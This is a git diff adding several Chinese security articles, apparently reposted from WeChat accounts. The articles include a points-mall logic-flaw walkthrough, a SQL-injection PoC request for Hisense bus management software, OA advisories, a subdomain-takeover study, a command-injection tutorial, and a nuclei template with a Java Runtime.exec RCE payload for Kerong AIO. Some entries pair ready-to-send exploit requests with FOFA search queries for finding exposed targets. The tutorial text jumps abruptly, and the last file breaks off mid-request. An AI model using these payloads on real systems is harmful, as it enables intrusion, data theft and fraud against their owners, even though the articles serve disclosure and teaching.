+**千元稿费!还有保底奖励~(https://bbs.zkaq.cn)** + +这里我们首先弱口令直接进入到这个统一信息门户里面 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcor2g11KXaaK8TyqfsDDl7LIlC83MYfHD9v0ErS961NStcVKl3MpNT6mjpxXt1HCKyc64JVhCeFSA/640?wx_fmt=png&from=appmsg "") + +img + +直接来到图书管理系统里面。点击积分商城,可以看到这里可以利用积分兑换各种商品 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcor2g11KXaaK8TyqfsDDl7L9wRFmzT4icAoBxx1ic76eToyGbBzvQcsfJ0LyjPaCLhg3Gf6X6XzOISg/640?wx_fmt=png&from=appmsg "null") + +img + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcor2g11KXaaK8TyqfsDDl7L3EsM4ia7rBNTaZugErDhnpArsicLYBbmMryYplyAvwPwp7W4RzO7mopQ/640?wx_fmt=png&from=appmsg "") + +img + +此时她的积分数是146,但是这里存在逻辑缺陷漏洞,可以进行刷分 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcor2g11KXaaK8TyqfsDDl7LxlZ8UC0CtN9EwC2ZibpRCibmdVBic9KzYBbPibZ2vd8pomJ1Qlnms9sjtw/640?wx_fmt=png&from=appmsg "null") + +img + +来到商城主页,选一个最贵的产品,直接点击立即预定进行抓包 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcor2g11KXaaK8TyqfsDDl7LHBv2CykMUMaCWcJvpk7BIV5Fx7libPkiaMs6MoAELe0Ja9xSAYhwLib2A/640?wx_fmt=png&from=appmsg "") + +img + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcor2g11KXaaK8TyqfsDDl7LBDAhtf98ibkze08jKLkPKFsnR4LUzZBjfhlIzOsjvEMnUfwYVht8zjg/640?wx_fmt=png&from=appmsg "") + +img + +请求的数据包如下: + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcor2g11KXaaK8TyqfsDDl7L2oebS6neLe7UicaKJYmtFAmn3Kbs56JVIicwVctaWNZRs1WLMv0mY2Xg/640?wx_fmt=png&from=appmsg "null") + +img + +补充:这里我们要对一些参数要特别的敏感才行,看到要条件反射,这里可不可以修改参数来获得不一样的返回结果,极有可能存在某些漏洞 + +接下来我们直接发送到重放模块,把第一个1改为-1,前面的是商品数量,后面那个是商品的编号,然后多点击几次重放即可获取到许多积分,同时还能获取到商品(这里我也是试了好几次的,不存在一次就成功的!) + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcor2g11KXaaK8TyqfsDDl7La4g6QyibYsqEH0K7R5u4E2ibGW44iaIib0KK98H2uQEXXacJCzubX3GQww/640?wx_fmt=png&from=appmsg "null") + +img + +然后我们放包查看,可以看到此时的积分已经从原来的146变成31346啦,直接翻了几十倍,被利用起来的话,损失巨大 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcor2g11KXaaK8TyqfsDDl7Lrno0WKLibxWQbTm26Iwhsfrs82bd2uOics92Y5qg5EByRIp7qLNak69g/640?wx_fmt=png&from=appmsg "") + +img + +更离谱的,我们可以做到又吃又拿的,同时购买的商品还是有效的,具有有效兑换码,意味着学校是成倍亏损的,打开预订单可以看到 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcor2g11KXaaK8TyqfsDDl7La2UTfqVT1l5SkD6iaOjCwReMUhMJMACYyjtUHSfateWtOPtHLmZjStg/640?wx_fmt=png&from=appmsg "") + +img + +每一个兑换码都是不一样的,支持兑换,而且还可以更换商品的编码,兑换其他商品,修改不同商品的编码即可兑换不同的商品 + +商品编码点击商品,url地址get参数直接获取 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcor2g11KXaaK8TyqfsDDl7Leuw8UgD0NtAcEaq77DrAXIkceHaqbcm3vJUoktsnPvpbjYOAekYdPA/640?wx_fmt=png&from=appmsg "") + +img + +然后抓包修改这个参数即可,前面依旧改为-1,直接重放 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcor2g11KXaaK8TyqfsDDl7LLvEc1X9ndLiaGE1tKrh0VN3vGH7QDmwlaFEeRB9m3acibXCib1rcCPBPw/640?wx_fmt=png&from=appmsg "") + +img + +直接靠刚开始的146积分拿下全部商品,有兑换码就是可以兑换的,学校还送我积分 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcor2g11KXaaK8TyqfsDDl7LFklqib3oCyCsQ0e0Meicnn18x9GtITf30CqibrCEroud9flicsL4pTIC5A/640?wx_fmt=png&from=appmsg "") + +img + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcor2g11KXaaK8TyqfsDDl7LA4gYndvRYLbeaRYuLTRicT00vcGcqvicQ1W5RQkDNhdr3icgzyoG2PibqQ/640?wx_fmt=png&from=appmsg "") + +img + +这里的话,就是存在一个很明显的逻辑缺陷漏洞,后台没有对数量为负数时候进行校验,导致算法出现错误,出现金额积分和数量均为负数的情况,导致可以积分相减就变成正数,于是个人积分就会越来越多啦,同时还可以购买商品 + +总结: + +就是在积分兑换,金钱相关等地方要多加留意一下,多抓包,尝试修改那个敏感参数,说不定会有意外惊喜呢 + +最后,相关漏洞已报送平台,测试数据已清除,继续加油!! +``` +``` + diff --git a/doc/海信智能公交企业管理系统 OrgInfoMng.aspx SQL注入漏洞.md b/doc/海信智能公交企业管理系统 OrgInfoMng.aspx SQL注入漏洞.md new file mode 100644 index 00000000..4866ee92 --- /dev/null +++ b/doc/海信智能公交企业管理系统 OrgInfoMng.aspx SQL注入漏洞.md @@ -0,0 +1,108 @@ +# 海信智能公交企业管理系统 OrgInfoMng.aspx SQL注入漏洞 +Superhero nday POC 2024-11-25 02:12 + +![](https://mmbiz.qpic.cn/mmbiz_png/Melo944GVOJECe5vg2C5YWgpyo1D5bCkYN4sZibCVo6EFo0N9b7Kib4I4N6j6Y10tynLOdgov9ibUmaNwW5yeoCbQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +![](https://mmbiz.qpic.cn/mmbiz_png/Melo944GVOJECe5vg2C5YWgpyo1D5bCkhic5lbbPcpxTLtLccZ04WhwDotW7g2b3zBgZeS5uvFH4dxf0tj0Rutw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +![](https://mmbiz.qpic.cn/mmbiz_png/Melo944GVOJECe5vg2C5YWgpyo1D5bCk524CiapZejYicic1Hf8LPt8qR893A3IP38J3NMmskDZjyqNkShewpibEfA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +内容仅用于学习交流自查使用,由于传播、利用本公众号所提供的 +POC +信息及 +POC对应脚本 +而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号nday poc及作者不为此承担任何责任,一旦造成后果请自行承担!如文章有侵权烦请及时告知,我们会立即删除文章并致歉。谢谢! + + +**00****** + +**产品简介** + + +海信智能公交企业管理系统是一套以智慧车、智慧站、智慧场为基础,以大数据和人工智能技术的公交云脑为核心,旨在全面提升公交企业的安全保障能力、运营生产效率、企业管理水平、决策分析能力和乘客出行体验的综合管理系统。基于大数据和人工智能技术构建的核心处理平台,具有数据接入处理能力、逻辑推理能力以及微服务架构的智慧公交五大应用能力。它能够对收集到的各种数据进行分析和处理,为企业管理提供智能化决策支持。 + + +**01****** + +**漏洞概述** + + +海信智能公交企业管理系统 OrgInfoMng.aspx 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + + +**02****** + +**搜索引擎** + + +FOFA:  +``` +body="var _FactoryData" +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwIZGXIAwKO6U1nRGsmceKFKCqQwJdmX2EtpfGFicURKAyzoAO3fS7JE8VfiaCm1tFQBrvD8CiapkL3VQ/640?wx_fmt=png&from=appmsg "") + + +**03****** + +**漏洞复现** +``` +GET /Erp/ErpAdmin/Form/OrgInfoMng.aspx?RSID=1%27+AND+9512%3DCTXSYS.DRITHSX.SN%289512%2C%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289512%3D9512%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29%29--+sfjW HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Connection: close +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwIZGXIAwKO6U1nRGsmceKFKNKGfrKVRhpiaGSC8oeBXO9sInz1fWI5gm3rMuB6a00RMeluicIrA2DPA/640?wx_fmt=png&from=appmsg "") + +sqlmap验证 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwIZGXIAwKO6U1nRGsmceKFKhTzW5DTBalFaHVjcGgEH113VbI5w3fRzVsaOVoichibibWtB9qKtc5JUA/640?wx_fmt=png&from=appmsg "") + + +**04** + +**检测工具** + + +nuclei + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwIZGXIAwKO6U1nRGsmceKFKLdiaoZus0pqbu3pYdXf13iciaRjhl7FiawCBXqJuggrg7la7dicr0icqeB6g/640?wx_fmt=png&from=appmsg "") + +afrog + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwIZGXIAwKO6U1nRGsmceKFKhvgpuJssKZvfF5zFRs7bhibqo8iaE0rSiaBPY3meayTtNRicokwoqb1WEg/640?wx_fmt=png&from=appmsg "") + +xray + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwIZGXIAwKO6U1nRGsmceKFK5Hxwdnib2rMHuxm8lbOazhukAmVEW89ZjziahOibGzGQL3eA4RdetibkvA/640?wx_fmt=png&from=appmsg "") + + +**05****** + +**修复建议** + + +1、关闭互联网暴露面或接口设置访问权限 + +2、升级至安全版本 + + +**06****** + +**内部圈子介绍** + + +1、本圈子主要是分享网上公布的1day/nday POC详情及对应检测脚本,目前POC脚本均支持xray、afrog、nuclei等三款常用工具。  + +2、三款工具都支持内置poc+自写poc目录一起扫描。  + +3、保持每周更新10-15个poc。  + +4、所发布的POC脚本均已测试完毕,直接拿来即用。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwI0X77l5WtnpfTexA6RwHXSbf1x3ZyT3bhcbWzRoFLyAgHkSMk9yGaZK5FDGcSCQp9ibPcicxHXIOcg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "") + + + diff --git a/doc/漏洞预警 | 九思OA任意文件读取漏洞.md b/doc/漏洞预警 | 九思OA任意文件读取漏洞.md new file mode 100644 index 00000000..da24b79b --- /dev/null +++ b/doc/漏洞预警 | 九思OA任意文件读取漏洞.md @@ -0,0 +1,43 @@ +# 漏洞预警 | 九思OA任意文件读取漏洞 +浅安 浅安安全 2024-11-25 00:00 + +**0x00 漏洞编号** +- # 暂无 + +**0x01 危险等级** +- 高危 + +**0x02 漏洞概述** + +九思OA办公自动化系统平台基于开发JAVA语言开发,封装了大量接口、构件,以多维门户形式展现,OA系统支持各种部署模式、各种操作系统、各种数据库和中间件,并具备完备的配置体系、接口体系和插件体系,支持未来的不断扩展。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/7stTqD182SUa31NzHTaaCIE7AEkrcLPY19woVFm92BcBkqLZMpqoPl9Rc4PBnWbibQHDRRaevxJNIKjxIWLdLlw/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +**0x03 漏洞详情** +### +### + +**漏洞类型:** +任意文件读取 + +**影响:** +获取敏感信息 + +**简述:** +北京九思协同办公软件的/jsoa/dl.jsp接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件、数据库配置文件等等,导致网站处于极度不安全状态。 +### + +**0x04 影响版本** +- 九思OA + +**0x05****POC状态** +- 已公开 + +**0x06****修复建议** + +**目前官方已发布漏洞修复版本,建议用户升级到安全版本****:** + +http://www.jiusi.net/ + + + diff --git a/doc/漏洞预警 | 点企来客服系统硬编码未授权漏洞.md b/doc/漏洞预警 | 点企来客服系统硬编码未授权漏洞.md new file mode 100644 index 00000000..bc861629 --- /dev/null +++ b/doc/漏洞预警 | 点企来客服系统硬编码未授权漏洞.md @@ -0,0 +1,41 @@ +# 漏洞预警 | 点企来客服系统硬编码未授权漏洞 +浅安 浅安安全 2024-11-25 00:00 + +**0x00 漏洞编号** +- # 暂无 + +**0x01 危险等级** +- 高危 + +**0x02 漏洞概述** + +禾匠点企来客服系统是独立源码部署的客服系统,支持接入到小程序、公众号、网站、APP。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/7stTqD182SWicwkicszFczgBVUWTG428aXZbkAepcCvrricfPo20fEVialDibAC06eq6wqNWjAibpibgpVn9qYApRfo1g/640?wx_fmt=png&from=appmsg "") + +**0x03 漏洞详情** + +**漏洞类型:** +硬编码token + +**影响:** +敏感信息泄露**** + +**简述:** +点企来客服管理系统的token存在硬编码未授权漏洞,未授权的攻击者可以利用伪造的cookie绕过登录。 +### + +**0x04 影响版本** +- 点企来客服管理系统 + +**0x05****POC状态** +- 已公开 + +**0x06****修复建议** + +**目前官方已发布漏洞修复版本,建议用户升级到安全版本****:** + +https://www.zjhejiang.com/ + + + diff --git a/doc/研究217篇子域接管漏洞报告后的总结.md b/doc/研究217篇子域接管漏洞报告后的总结.md new file mode 100644 index 00000000..1ec13de7 --- /dev/null +++ b/doc/研究217篇子域接管漏洞报告后的总结.md @@ -0,0 +1,139 @@ +# 研究217篇子域接管漏洞报告后的总结 +白帽子左一 白帽子左一 2024-11-25 04:00 + +扫码领资料 + +获网安教程 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CBJYPapLzSFbaUgVwdsriauB77CgQS8lyBNAxtx9IMqJQdhuuoITunu8A5Gp7kFjF7BvEXSaLMuDTYhnu7Nicghg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + + +![](https://mmbiz.qpic.cn/mmbiz_png/b96CibCt70iaaJcib7FH02wTKvoHALAMw4fchVnBLMw4kTQ7B9oUy0RGfiacu34QEZgDpfia0sVmWrHcDZCV1Na5wDQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + + + +**来****Track安全社区投稿~** + +**赢千元稿费!还有保底奖励~(https://bbs.zkaq.cn)** +### 子域接管漏洞综合分析:SDTO、DNS劫持、悬空DNS、CNAME配置错误等 + +我收集了 **HackerOne** 上的 143 篇 SDTO(子域接管)漏洞报告,以及 74 篇详细的技术文章,然后潜心研究并记录下心得。在这里,我将分享我的发现,并教你如何正确地寻找 SDTO 漏洞。 +### 子域接管 TLDR(快速入门) + +我不会在这里详细展开,因为本文旨在提供更适合中高级猎人的见解。不过,我尽量让新手也能读懂这篇文章。 + +子域接管是一种 **高危**(甚至可能是 关键)漏洞。当某个资产(通常是子域)通过 **CNAME DNS 记录** 指向第三方托管提供商时,它会从该第三方提供商获取内容。如果公司停止支付该托管服务费用,但仍然 **保留** CNAME 引用,攻击者可能会注册该第三方服务,从而使公司子域指向攻击者控制的资源。 +### 子域的类型 — 应该寻找哪些子域? + +一开始,出于某些原因,我假设大多数易受攻击的子域是内部子域,它们本来就不应该面向用户,并且被开发者遗忘了。例如 api.e2e-kops-aws-canary.test-cncf-aws.canary(这是 “@codecancare” 的 Twitter 用户 “todayisnew” 发现的漏洞,一个让我无比敬佩的人)。 + +**但我错了**,原因也非常合理。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CBJYPapLzSEXZcl4KCI6HwHVmR7c56tn759aCn7TvIibV9CeUYicjqCbrmvsvKDbVa0669m7uU82QhUZmiaNYfsgg/640?wx_fmt=png&from=appmsg "null") + +img + +**仅有 27.1%** 的易受攻击子域是为 **内部** 使用而设计的。这些子域通常包含诸如 “stage”、“dev”、“test” 等单词,通常与其他单词组合,或通过连字符或点与现有子域连接。这表明在寻找新子域时,针对现有子域进行排列组合非常重要,可以使用  +AltDNS[1] 实现此目的。这类子域的示例包括:8ybhy85kld9zp9xf84x6、photo-test、dev-admin、api.techprep。 + +**57%** 的易受攻击子域是为 **公开** 使用而设计的,曾经是供用户访问的。这个比例是合理的,因为随着公司的发展,它们往往会尝试进入新领域,这些尝试中许多会失败,导致基础设施或网站部分被移除,但 CNAME 可能会被遗忘。这也解释了为什么 最常见的子域是“blog”,共有 5 个实例。 +### 如何发现这些子域? + +遗憾的是,在撰写漏洞报告时,漏洞猎人并没有义务披露发现方法,因此 **43.9%** 的报告没有提及或暗示子域的发现过程。 + +大多数人寻找 SDTO 时会使用  +subjack[2] 或 nuclei 等工具,这些工具通过字符串匹配进行搜索。一些托管服务会显示 404 页面,可能表明该站点存在被接管的风险,猎人会关注这些页面。然而,**仅有 23%** 的漏洞报告表明使用了这种方法。因此,也许你应该 +重新评估你的子域接管方法 +。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CBJYPapLzSEXZcl4KCI6HwHVmR7c56tnXkiaq5R9WiaDLo8PVDnYmz33rysLgFWjBXI1JMcF7JcQ3ZSTHgNVtyxQ/640?wx_fmt=png&from=appmsg "null") + +img + +**30.2%** 的漏洞报告表明,通过解析域名发现了子域接管漏洞,可能使用了 dig 命令,接着检查 CNAME 记录是否指向已知的易受攻击服务,然后进行更深入的分析。现代模板工具(如 nuclei)现在支持 DNS 检查,因此可以用于部分漏洞发现。 + +**在漏洞赏金社区中,我从未见过对此进行讨论**,但实际上,在没有第三方托管服务的情况下接管子域是可能的,这种情况在 **2.2%** 的时间内被观察到。具体来说,一个子域依赖于一个独特的根域,当该根域停止续订时,注册该域将产生相同的接管效果。 +### 是否应该使用 Can-I-Take-Over-XYZ? + +如果你曾研究过 SDTO,你一定听说过 Can-I-Take-Over-XYZ,这是一个 GitHub 仓库,展示了哪些服务易受攻击,哪些服务安全。然而,我发现自己使用的方法并不正确,并且**你可能也没有正确使用**,此外,**还有许多服务未列在 Can-I-Take-Over-XYZ 上**,这意味着99% 的漏洞猎人尚未追踪这些漏洞。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CBJYPapLzSEXZcl4KCI6HwHVmR7c56tnr2Utmt5cYt4CcD1Im6lXfdZywlUQ8X2ghPiacluibyMXAOaoMUYWbWmA/640?wx_fmt=png&from=appmsg "null") + +img + +**首先**,大多数人仅浏览过 Can-I-Take-Over-XYZ的首页,但实际上,这个页面更新频率很低,仅列出了少部分服务。你可以打开  +Issues 页面[3],并通过 **"vulnerable" 标签** 进行搜索,发现远比你最初预想的更多服务。 + +**其次**,有许多服务**从未被报告到该仓库**。例如,我发现了一些未记录的服务,包括 readymag、 +reg.ru[4]、Shoplo、 +icn.bg[5]、 +modulus.io[6]、Mailgun、DYN、Fider、Wufoo、bigcartel。这些服务中可能还有更多。如果你遇到某个 CNAME 没有被记录,深入研究它,你可能会成为第一个发现该漏洞的人! +### 托管平台的类型 + +如果你正在寻找 SDTO 漏洞,了解目标是什么会有所帮助。每个托管服务提供商都有自己的一套接管流程或检测漏洞的方法。因此,最好的方式是选择一个或几个特定的提供商,并专注于寻找这些提供商的漏洞。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CBJYPapLzSEXZcl4KCI6HwHVmR7c56tnG3rOENCnqcq6N4aHXa43pqMD7Y6MS8ibKYiayXlZQvKLozqibr7AObTVg/640?wx_fmt=png&from=appmsg "null") + +img + +**图表显示了从报告中提取的 55 个独特托管商的分布情况。由于数据量较大,其中部分已被截断。** +### SDTO 随时间变化——这种漏洞还值得寻找吗? + +在研究这个问题时,我预测随着托管服务商逐渐实施安全功能以防止 SDTO 的发生,漏洞子域会变得越来越少。 + +以下是一张显示 SDTO 发生时间的图表: + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CBJYPapLzSEXZcl4KCI6HwHVmR7c56tniaRIhEtDhyNQOOb76wO2ciaWFIGtyM5obWX1sus7ribdcALibKnsPB0FiaA/640?wx_fmt=png&from=appmsg "null") + +img + +**图表显示轻微的上升趋势** + +然而,我认为这可能适用于所有漏洞类型,因为随着漏洞赏金计划的普及,报告数量自然会增加。不过,由于样本量相对较小,我对从图表中得出明确结论持谨慎态度。然而,值得注意的是,SDTO 并没有如预期那样显著下降,**因此 SDTO 仍然值得继续挖掘**。 +## 影响力提升——如何获得更高的奖励 + +SDTO 通常被默认视为**高严重性漏洞**,但**这并不意味着到此为止**。你可以通过漏洞链结合的方式来展示更大的影响力,甚至将漏洞提升至**关键严重性**。 +### 利用 SDTO 提升其他漏洞的危害性 + + +•**SSRF(服务器端请求伪造)** SSRF 通常被视为 P5/P4(信息性/低严重性)漏洞,因为多数情况下它只能调用外部服务器,且目标服务器通常会配置黑名单以阻止访问内部资源。然而,如果我们利用 SDTO 接管子域(如 blog.example.com),可以在该页面上设置一个重定向链接,例如 blog.example.com/?redirect=http://169.254.169.254。这样,目标服务器会通过允许的子域访问被阻止的 IP,进而绕过过滤器,获取敏感信息(例如 AWS 数据)。 + +•**绕过内容安全策略(CSP)** CSP 旨在预防 XSS 攻击,但通过 SDTO,我们可以绕过该策略。如果接管的子域允许我们托管内容(如 JavaScript 文件),且 CSP 策略设置过于宽松(如 *.example.com),那么可以将该子域利用为存储型 XSS 的载体,进一步窃取会话 Cookie 或实现账户接管。 + +## 其他漏洞赏金技巧 + + +1.使用 **Wayback Machine** 捕获子域接管的证据。即使漏洞被修复或接管失效,你仍有证据证明漏洞存在!(参考:https://hackerone.com/reports/380158) + +2.**检查邮件服务器**!即使它们不托管内容,也可能存在漏洞。(参考:https://hackerone.com/reports/736863) + +3.**二阶子域接管漏洞(Second Order Subdomain Takeovers)** 也是真实存在的 (参考:https://blogs.msmvps.com/alunj/2021/08/15/second-order-subdomain-takeovers-they-do-exist/)。 + +4.使用 httpx -probe 查找不在线的域名/子域。 + +5.**根域名** 也可能被接管!(参考1:https://hackerone.com/reports/1226891, 参考2:https://hackerone.com/reports/159156:) +## 关键点总结! + + +•**57%** 的易受攻击子域是面向**公众**使用的! + +•**检查 DNS 记录**比使用字符串匹配方法寻找 SDTO 更有效。 + +•**查看 Can-I-Take-Over-XYZ 的 Issues 页面**以发现更多未列出的服务。 + +•不要只关注 AWS 接管漏洞,还有**很多其他托管服务提供商**可供挖掘! + +### References + +[1] AltDNS: https://github.com/infosec-au/altdns[2] subjack: https://github.com/haccer/subjack[3] Issues 页面: https://github.com/EdOverflow/can-i-take-over-xyz/issues[4] reg.ru: https://reg.ru/[5] icn.bg: http://icn.bg/[6] modulus.io: http://modulus.io/ + +以上内容由白帽子左一 +翻译并整理。原文:https://medium.com/@BrownBearSec/what-i-learnt-from-reading-217-subdomain-takeover-bug-reports-c0b94eda4366 + +**声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学********习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!** + +**如果你是一个网络安全爱好者,欢迎加入我的知识星球:zk安全知识星球,我们一起进步一起学习。星球不定期会分享一些前沿漏洞,每周安全面试经验、SRC实战纪实等文章分享,微信识别二维码,即可加入。** + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/CBJYPapLzSFIJlRFYoItlJDrScxuTPmfnqibC1ApJ2OKh5sF41qicCo5AvQ4icuG8kbqQxZ5HVypvJ8jZDzsmD37Q/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + + diff --git a/doc/破解命令注入漏洞:详解原理、绕过技巧与防护策略.md b/doc/破解命令注入漏洞:详解原理、绕过技巧与防护策略.md new file mode 100644 index 00000000..c6cadffd --- /dev/null +++ b/doc/破解命令注入漏洞:详解原理、绕过技巧与防护策略.md @@ -0,0 +1,165 @@ +# 破解命令注入漏洞:详解原理、绕过技巧与防护策略 +原创 VlangCN HW安全之路 2024-11-25 03:00 + +在Web安全领域中,命令注入漏洞(OS Command Injection)一直是一个危害严重的安全问题。本文将深入浅出地介绍命令注入漏洞的原理、检测方法、利用技巧以及防护措施。 +## 一、什么是命令注入漏洞? + +命令注入漏洞,也称为shell注入,是一种允许攻击者在目标服务器上执行任意操作系统命令的Web安全漏洞。当应用程序在处理用户输入时,未经proper验证就将其作为系统命令执行,就可能导致此类漏洞。 + +举个简单的例子,假设有一个查询商品库存的Web应用: +``` + +``` + +正常访问链接: +``` +https://example.com/stock?productID=381 +``` + +但攻击者可能提交: +``` +381 & whoami +``` + +这样服务器实际执行的命令就变成了: +``` +stockreport.pl 381 & whoami +``` +## 二、命令注入的实现原理 + +命令注入漏洞的产生主要基于以下三个条件: +1. 应用使用了可执行系统命令的函数 + +1. 用户输入被传入这些函数 + +1. 对Shell特殊字符未做充分过滤 + +在PHP中,常见的危险函数包括: +- system() + +- exec() + +- shell_exec() + +- passthru() + +- popen() + +- proc_open() + +此外,还要注意eval()等代码执行函数,它们同样可能导致命令执行: +- eval() + +- assert() + +- preg_replace(/e修饰符) + +- create_function() + +## 三、命令注入的检测方法 +### 1. 常见的注入检测方法: +- 回显检测:使用echo等命令验证输出 + +- 时间延迟检测:使用ping或sleep命令 + +- 带外数据检测:使用DNS或HTTP请求 + +- 错误消息检测:观察系统报错信息 + +### 2. 常用的测试命令: + +Windows系统: +``` +whoamiveripconfig /alltasklist +``` + +Linux系统: +``` +whoamiuname -aifconfigps -ef +``` +## 四、高级利用技巧 +### 1. 命令分隔符的使用: + +Linux系统支持: +``` +command1 ; command2 # 顺序执行 command1 | command2 # 管道执行 command1 || command2 # 条件执行 command1 && command2 # 条件执行 `command` # 命令替换 $(command) # 命令替换 +``` + +Windows系统支持: +``` +command1 & command2 # 并行执行 command1 && command2 # 条件执行 command1 | command2 # 管道执行 command1 || command2 # 条件执行 +``` +### 2. 绕过技巧: +1. 空格绕过: + +``` +${IFS}替代空格cat +> 本文仅供学习交流使用,请勿用于非法用途。若使用本文内容进行测试,请确保已获得授权。 + + +希望这篇文章能帮助大家更好地理解命令注入漏洞,构建更安全的Web应用。如果您觉得文章有帮助,欢迎关注我的公众号"HW安全之路",一起交流学习。 + + diff --git a/doc/科荣AIO系统UtilServlet接口处存在代码执行漏【漏洞复现|附nuclei-POC】洞.md b/doc/科荣AIO系统UtilServlet接口处存在代码执行漏【漏洞复现|附nuclei-POC】洞.md new file mode 100644 index 00000000..33fd70d4 --- /dev/null +++ b/doc/科荣AIO系统UtilServlet接口处存在代码执行漏【漏洞复现|附nuclei-POC】洞.md @@ -0,0 +1,126 @@ +# 科荣AIO系统UtilServlet接口处存在代码执行漏【漏洞复现|附nuclei-POC】洞 +原创 kingkong 脚本小子 2024-11-25 03:33 + +**** +**免责声明:** +**本文内容仅供技术学习参考,请勿用于违法破坏。利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,与作者无关。如有侵权请联系删除。** + +**** +**** +**漏洞描述:** + +科荣AIO系统UtilServlet接口处存在代码执行漏。 +攻击者 +可能利用此漏洞执行恶意命令,导致系统执行未授权的操作,获取服务器权限。 + + +01 + +— + +**Nuclei POC** + + +``` +id: kerong-AIO-UtilServlet-RCE + +info: + name: 科荣AIO系统UtilServlet接口处存在代码执行漏 + + author: kingkong + severity: high + metadata: + fofa-query: body="changeAccount('8000')" + +http: + - raw: + - | + POST /UtilServlet HTTP/1.1 + Host: {{Hostname}} + User-Agent:Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/534.57.2(KHTML, like Gecko)Version/5.1.7Safari/534.57.2 + Accept-Encoding: gzip, deflate, br + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + Content-Length:322 + + operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+whoami").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field + + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "content_length>=3 && content_length<=30 && status_code==200" + condition: and + +``` + + + +02 + +— + +搜索语法 +``` +FOFA:body="changeAccount('8000')" +``` + +![](https://mmbiz.qpic.cn/mmbiz_png/aEP4jW2ohndtSd4x25ttSzbFiaDEwic4pdEvykFMxxn1aOuO8uEdH34grwlnec6AAldsOhW5THvccjyJuDTfmjibA/640?wx_fmt=png&from=appmsg "") + +界面如下 + +![](https://mmbiz.qpic.cn/mmbiz_png/aEP4jW2ohndtSd4x25ttSzbFiaDEwic4pdRc6IQXfxlgP7oyomwaxgiagLnlDWT3ibI3MibS7Viamlblah8h67sbtYlA/640?wx_fmt=png&from=appmsg "") + +03 + +— + +漏洞复现 + +![](https://mmbiz.qpic.cn/mmbiz_png/aEP4jW2ohndtSd4x25ttSzbFiaDEwic4pd4Wo4via71vo1FpvBbGt8Jaa10b1QNicicbrSmiaPI9W3ZX51VarW1qFLSg/640?wx_fmt=png&from=appmsg "") +漏洞检测POC +``` +POST /UtilServlet 